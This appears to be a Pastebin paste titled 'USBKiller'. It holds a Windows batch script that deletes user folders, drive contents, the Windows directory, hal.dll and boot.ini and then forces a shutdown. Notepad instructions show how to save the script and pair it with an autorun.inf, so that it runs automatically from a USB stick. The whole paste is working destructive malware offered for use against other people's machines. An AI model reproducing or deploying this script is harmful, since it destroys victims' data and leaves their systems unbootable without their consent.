Advertisement
Muckthemayn

USBKiller

Jul 19th, 2017
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.40 KB | None | 0 0
  1. @echo off
  2. Echo Nuking in 3... 2... 1...
  3. dir d:
  4. echo Y|del D:\
  5. dir c:
  6. echo Y|del C:\documents and settings
  7. echo Y|del C:\users
  8. echo Y|del C:\windows\system32\hal.dll
  9. echo Y|del C:\windows
  10. attrib -s -h C:\boot.ini
  11. PING localhost -n 1 -w 3 >NUL
  12. echo Y|del C:\boot.ini
  13. echo Y|del C:\
  14. PING localhost -n 1 -w 6 >NUL
  15. shutdown.exe -s -t 30
  16.  
  17. 1. Open notepad
  18. 2. Create this
  19. 3. Save as, fill name "USBKiller.Bat" and Save
  20. __________________________________________________________________________________________________________________________________________
  21. __________________________________________________________________________________________________________________________________________
  22. __________________________________________________________________________________________________________________________________________
  23.  
  24. [autorun]
  25. ;Open=USBKiller.Bat
  26. ShellExecute=USBKiller.Bat
  27. UseAutoPlay=1
  28.  
  29. 1. Open Notepad
  30. 2. Create this
  31. 3. Save as, fill name "AutoRun.Inf" and Save
  32.  
  33. __________________________________________________________________________________________________________________________________________
  34. __________________________________________________________________________________________________________________________________________
  35. __________________________________________________________________________________________________________________________________________
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement